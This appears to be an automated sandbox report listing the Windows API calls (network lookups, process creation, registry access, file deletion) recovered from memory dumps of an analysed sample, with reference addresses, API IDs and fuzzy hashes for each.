                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313585660.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313585660.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 04E0400B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindClose.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 04E03589
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 04E06A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E037BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04E02282
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: 39e0eb531321752139b3b0e94e50857accde43311b899ec636470538816e911a
                                                                      • Instruction ID: 6435a968dce4e1493a231d96ad6d6c492849b055244a4e8828e5df806bc4fb45
                                                                      • Opcode Fuzzy Hash: 39e0eb531321752139b3b0e94e50857accde43311b899ec636470538816e911a
                                                                      • Instruction Fuzzy Hash: D031507540E3C05FD7138B758C61AA1BFB4EF47614F0A45DBD8848F1A3D2646909CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegSetValueExW.KERNELBASE(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E04D44
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 6028012dfb0b14055e1785a77cc04d07b98da97c6f464bb867ea1dadac57ae0e
                                                                      • Instruction ID: c252332e7385c2cca56d23c1f51aee953038cb41a40573a37be326ca10b13c40
                                                                      • Opcode Fuzzy Hash: 6028012dfb0b14055e1785a77cc04d07b98da97c6f464bb867ea1dadac57ae0e
                                                                      • Instruction Fuzzy Hash: 14315D7100E3C0AFD7138B648D50B52BFB8AF07214F0985DBE985DB2A3D268A849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E030BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 9c0e213dc3211c3488af5dbfb52033de8758fb9113098219e8f98205cbfa24cf
                                                                      • Instruction ID: d3605f482feef9377c7b2255ac514de9fbb3c41714352e4c2432281351e95fa0
                                                                      • Opcode Fuzzy Hash: 9c0e213dc3211c3488af5dbfb52033de8758fb9113098219e8f98205cbfa24cf
                                                                      • Instruction Fuzzy Hash: 63317E7550E3C09FD7138B359C55692BFB4EF43224B0980EBDD85CF2A3D229A949C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 04E036B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: bcdf5fff2f51ec300195e1959830a143f0e455d8bef956792ed071c63941713c
                                                                      • Instruction ID: 790caeaccdb61dea820286b816d0c5de275208c9e3ed7aaca9d34444506d6156
                                                                      • Opcode Fuzzy Hash: bcdf5fff2f51ec300195e1959830a143f0e455d8bef956792ed071c63941713c
                                                                      • Instruction Fuzzy Hash: 32317E7150E3C05FD7038B758C61B65BFB49F47610F1D80CBD8848F2A3E624691AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 04E06A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 4f42aec920e0c808326a235ebd28de884e8ec5753a524eb25f7e964b1e032f9c
                                                                      • Instruction ID: 0173b61ee71b90c7a671033a910db8aea6ab5f29ff01bcd1f4973fa0d1d7c488
                                                                      • Opcode Fuzzy Hash: 4f42aec920e0c808326a235ebd28de884e8ec5753a524eb25f7e964b1e032f9c
                                                                      • Instruction Fuzzy Hash: 64319071200201AFEB31DF65CC41FA6FBECEF08710F14896AFA459A291D671F555CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04E00DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: e4c6b14f40dc972f3feba34f35adb58189aead6dbc3a3eae77c61815daa74890
                                                                      • Instruction ID: 6021c7a973f3508e938f9ce465139f30fe351bd83fa0b06c1e7155d6463cbd14
                                                                      • Opcode Fuzzy Hash: e4c6b14f40dc972f3feba34f35adb58189aead6dbc3a3eae77c61815daa74890
                                                                      • Instruction Fuzzy Hash: DC31C272404344AFEB228F65DC44F67BFACEF45320F04886EF985DB152D224A819CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03C7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 327e7181dd53a8ad8a7042d0221f66f20220444ae2f3a030038e60a22a744a7f
                                                                      • Instruction ID: 556ec73fa89632e20072f56dc3abbf0ec9ec94adace78e5928f5adad79e791f7
                                                                      • Opcode Fuzzy Hash: 327e7181dd53a8ad8a7042d0221f66f20220444ae2f3a030038e60a22a744a7f
                                                                      • Instruction Fuzzy Hash: 103191B2409384AFE7228B65DC44F66BFA8EF46310F08849BED849B253D224A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 04E03589
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: bf73b222856708f3b4aadbaf920c25cd3d5154a0cf24cda77b9c13aed47756b2
                                                                      • Instruction ID: 10ba712c55a4add040d5b96b92d6270f123090421400f48f131c6b59c29fc92a
                                                                      • Opcode Fuzzy Hash: bf73b222856708f3b4aadbaf920c25cd3d5154a0cf24cda77b9c13aed47756b2
                                                                      • Instruction Fuzzy Hash: 0E218F72500204AFEB21DF65DC80FABFBACEF04710F04895AEE46CA291D670E549CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 9eedca87ba230cb7a2872b5a2494b0d601ea018293395a77974e462d5bec74f1
                                                                      • Instruction ID: 8417d2d9a10078ce4c547fe8ea0387e395184bb553b8c188a0b54983c5bd2a3d
                                                                      • Opcode Fuzzy Hash: 9eedca87ba230cb7a2872b5a2494b0d601ea018293395a77974e462d5bec74f1
                                                                      • Instruction Fuzzy Hash: 5D318171509380AFE712CB25DC45F96FFA8EF06314F08849AE9849F293D375A949CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 322273ce012432e825d05238ba0e74654f87806bdc66b752cda38da710fcb488
                                                                      • Instruction ID: 6b52ac221222ec609e5df83279d61b8b265590a1cfe969869a5ca28bd1fb0922
                                                                      • Opcode Fuzzy Hash: 322273ce012432e825d05238ba0e74654f87806bdc66b752cda38da710fcb488
                                                                      • Instruction Fuzzy Hash: CD31E572009380AFEB128F64DC45F96BFB8EF06314F0884DBE9859B193C225A945C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 08ec3bc1ba6ce1fa2c06255f82fc228b5b1ec407e3728d5fc553f6a0858825b9
                                                                      • Instruction ID: 82b7c944d5083435ff7825891af656ba9488bb14fd18f47272fe2d698dfbb830
                                                                      • Opcode Fuzzy Hash: 08ec3bc1ba6ce1fa2c06255f82fc228b5b1ec407e3728d5fc553f6a0858825b9
                                                                      • Instruction Fuzzy Hash: 1B31E4B2404780AFE722CF54DC44F96FFF8EF06320F04859AE9849B252D364A549CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E06292
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CertCertificateChainPolicyVerify
                                                                      • String ID:
                                                                      • API String ID: 3930008701-0
                                                                      • Opcode ID: f9944ff2ea4a3d49dd728b909415a8b23d0d5292dd1d5d0d8bb909d867ea2913
                                                                      • Instruction ID: 7b1d22ca1940ad734d4c738e45f9972299ce860c78a3ac4dc5774f8debd2b616
                                                                      • Opcode Fuzzy Hash: f9944ff2ea4a3d49dd728b909415a8b23d0d5292dd1d5d0d8bb909d867ea2913
                                                                      • Instruction Fuzzy Hash: 4C21E771509384AFE7128F64DC44F56BFB8EF06320F18849BE984DF293D224A849C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 04E009F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 60690895db6b138b0cb7dc0c685e7b8a8b50d1cc58ca2ab39e524646a60a9c41
                                                                      • Instruction ID: d728766cee05aed779a0276ab4f44191acad63656bc0621789179e2d7cdfa907
                                                                      • Opcode Fuzzy Hash: 60690895db6b138b0cb7dc0c685e7b8a8b50d1cc58ca2ab39e524646a60a9c41
                                                                      • Instruction Fuzzy Hash: 333161B1509380AFE712CF65DC45F56FFF8EF45220F08849AE9889B292D375E948CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 04E0400B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: c735b3b74c8f33ecc696e03f8f4584f890d58e895f14106ab565daaca59907f5
                                                                      • Instruction ID: 7465cd102125209ef1f61a5d440f978885b7ebd9eb2512ed1203cff5779cb2df
                                                                      • Opcode Fuzzy Hash: c735b3b74c8f33ecc696e03f8f4584f890d58e895f14106ab565daaca59907f5
                                                                      • Instruction Fuzzy Hash: A521BF71100304BFFB21DF64CC85FABFBACEF44710F10885AFA48AA281D6B4A5498B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04E03979
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: d26e97a4a93c50d5e04f53ede4157fe866f9ff3339353aa53ece4385e40d18eb
                                                                      • Instruction ID: 8742140741f5e8ee04c842ab560320c49075d170055cd1f76b098dff738d4ebb
                                                                      • Opcode Fuzzy Hash: d26e97a4a93c50d5e04f53ede4157fe866f9ff3339353aa53ece4385e40d18eb
                                                                      • Instruction Fuzzy Hash: 4B21D371409384AFE7128B25DC45F66FFB8EF46314F08849BED849F253D264A909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04E01596
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 5b67471f0c139ce597291a1b0a1f02e88c2dabad8b7e4a2d53a4f0aa02af0034
                                                                      • Instruction ID: 9019bd7ea08779f05ddf57854530a4c39fe61b39a105d130a2ded1f47e660384
                                                                      • Opcode Fuzzy Hash: 5b67471f0c139ce597291a1b0a1f02e88c2dabad8b7e4a2d53a4f0aa02af0034
                                                                      • Instruction Fuzzy Hash: A13180715093C06FD3138B259C55F62BFB8EF87610F1A81DBE8848B653D264A919C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 04E06D71
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID:
                                                                      • API String ID: 2030045667-0
                                                                      • Opcode ID: 31acdc02cd753696e34ffd0754eafeddbbb9dde697d7fae04ae6e4377a83c5f4
                                                                      • Instruction ID: cae55363897f23ee018c307da4faf51603348e453ddd37f6dedc2348e4a3ce5d
                                                                      • Opcode Fuzzy Hash: 31acdc02cd753696e34ffd0754eafeddbbb9dde697d7fae04ae6e4377a83c5f4
                                                                      • Instruction Fuzzy Hash: 6D314F7150E7C09FD7138F258C54A52BFB4EF17614B0A84DBDC84CB2A3D268A858C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0545A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 2237730302c5c94ac3092d099024b2f323e9070b11a3c3a816a0d235b78c44d7
                                                                      • Instruction ID: 779ea5a13d55f6aa77a8ca6975d0f9a8a1dc7746886107857918e3e4f53fbac3
                                                                      • Opcode Fuzzy Hash: 2237730302c5c94ac3092d099024b2f323e9070b11a3c3a816a0d235b78c44d7
                                                                      • Instruction Fuzzy Hash: 6621B671505340AFE722CF25DC44F56BFA8EF46310F08849BE945DB292D264E848CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04E05566
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      • Opcode ID: ce90d024a30b8092ccc4debc84308f9dc83ba068c77985108903dbb94e51466c
                                                                      • Instruction ID: 201ce5bf4eacb553d3a8c49e47ef1ffd66f9aecae7d9218771dade4433fd2b8a
                                                                      • Opcode Fuzzy Hash: ce90d024a30b8092ccc4debc84308f9dc83ba068c77985108903dbb94e51466c
                                                                      • Instruction Fuzzy Hash: 9221A2714093C06FD312CB65CC55F66BFB4EF87610F0984DBD8848B2A3D624A909C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04E00DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 1c9770ac9d0723c57f71dd0731aaad1fc977a654cde640b732b872637b27af8e
                                                                      • Instruction ID: 0d5d7f269b2e6191e41bc413f4ee599c61074f32aea7ab43f9194ecccf15283d
                                                                      • Opcode Fuzzy Hash: 1c9770ac9d0723c57f71dd0731aaad1fc977a654cde640b732b872637b27af8e
                                                                      • Instruction Fuzzy Hash: AF21AF72500304EFEB219F65DC44FABFBACEF08320F14896BEE459B251D670A5598B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0536A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: eb8e160461edfcd650fc0ac58dabee15fdbc84cb606c5d8ccaa80aca395bf9c5
                                                                      • Instruction ID: a7db7313b2e87b320e0c3147a773b7725cc16536bf6c5a83b5929f888ea52ec4
                                                                      • Opcode Fuzzy Hash: eb8e160461edfcd650fc0ac58dabee15fdbc84cb606c5d8ccaa80aca395bf9c5
                                                                      • Instruction Fuzzy Hash: 8021A771509384AFE712CF65DC45F56FFB8EF46320F08849BE985DB292D264A848CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03369
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: c5c46065999cb605211ef043c8652877c6249068484f3b45012260cebea3669a
                                                                      • Instruction ID: 2db9b6284065e6e655dda58a8e993753918eb6756900c0926a147f54ca8972be
                                                                      • Opcode Fuzzy Hash: c5c46065999cb605211ef043c8652877c6249068484f3b45012260cebea3669a
                                                                      • Instruction Fuzzy Hash: 95217171009380AFD7128F25CC44F66BFB8EF46320F0885DBE9949E292C365A449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E013D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: 45cffe33052be4aaf0854d714d2d431c43d2e9ec2f7cf2d406650321a82d3958
                                                                      • Instruction ID: 5b076377174a1b21322103d124fe297e7be6cd1da01563eb565a11c357065136
                                                                      • Opcode Fuzzy Hash: 45cffe33052be4aaf0854d714d2d431c43d2e9ec2f7cf2d406650321a82d3958
                                                                      • Instruction Fuzzy Hash: 51218172409384AFD7128F65CC44F96FFB8EF46310F0884ABEA84DF252D225A548C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04E00575
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: bd8ee72aa9000da2c0fd04e52314d61b01e2e80fac3d26400287ad1ae83cd7e4
                                                                      • Instruction ID: b3ecc7397128165d9fcb5b93b7867443c85af4cf05763606273264493a0938be
                                                                      • Opcode Fuzzy Hash: bd8ee72aa9000da2c0fd04e52314d61b01e2e80fac3d26400287ad1ae83cd7e4
                                                                      • Instruction Fuzzy Hash: 2A21B171505380AFE721CF65DC45F56FFA8EF46210F08849EE9848B292D375E948CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03B84
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: a2dc07dcc49fd01aa42458c7f2409d229009aac4565cb689a7f19db2af2921da
                                                                      • Instruction ID: 767fbb6aac3ffbb90fc51c33e98200baa9e8a5765585bbdfd63c15e8ac2f5b2c
                                                                      • Opcode Fuzzy Hash: a2dc07dcc49fd01aa42458c7f2409d229009aac4565cb689a7f19db2af2921da
                                                                      • Instruction Fuzzy Hash: EC21A171009384AFD7228F64DC44F97FFB8EF46314F04889BEA849B252D224A548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 550baabf70aab0be3052b2a411df25d390cd083f1b958b245b8d2f2c1d259521
                                                                      • Instruction ID: 667e1b5cc5875e6c0a1e2dd99f9001f139e5dc7469f658fd5e83588ba982cacc
                                                                      • Opcode Fuzzy Hash: 550baabf70aab0be3052b2a411df25d390cd083f1b958b245b8d2f2c1d259521
                                                                      • Instruction Fuzzy Hash: 3D219D72500204AEE721DF65DC44FABFBACEF04720F14886AEE959B241D660A5488A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00091
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: a091b65e613ca698af9a4e0cbd2bace22b96dcc3e48fb9dd7c54f791626ef373
                                                                      • Instruction ID: c2a360d982cd655ab448715299c47977d2ab098c77cdcc6fed1e10abdcb10702
                                                                      • Opcode Fuzzy Hash: a091b65e613ca698af9a4e0cbd2bace22b96dcc3e48fb9dd7c54f791626ef373
                                                                      • Instruction Fuzzy Hash: 9A21B372409380AFE7228F65DC40F67BFB8EF46314F08849BEE849B252D275A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E038A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: 5e06d0418a5f2f527fedca44abfb07999581b951ad38093a64e3103a7ce18ecf
                                                                      • Instruction ID: 3bb4df87f9895aed94dac50922de76d18ca38c4f427fc4c38bdb543dbf065b47
                                                                      • Opcode Fuzzy Hash: 5e06d0418a5f2f527fedca44abfb07999581b951ad38093a64e3103a7ce18ecf
                                                                      • Instruction Fuzzy Hash: 93219175409784AFE7128B25DC51FA2FFB8EF07314F0984DBE9849B293D224A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E002E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 48ef71202bbc80761a682a5f5b61bb6a7b5da23199ca1eb9ee27a8111fbd4753
                                                                      • Instruction ID: b172b9071d73cd0b1dcdf6884c7dc0c5b677a7df0b2a00e35101891767c597a1
                                                                      • Opcode Fuzzy Hash: 48ef71202bbc80761a682a5f5b61bb6a7b5da23199ca1eb9ee27a8111fbd4753
                                                                      • Instruction Fuzzy Hash: 5C219D72505344AFD722CF55DC44F67FFF8EF0A310F08849AEA859B292D264E548CB61
                                                                      Uniqueness

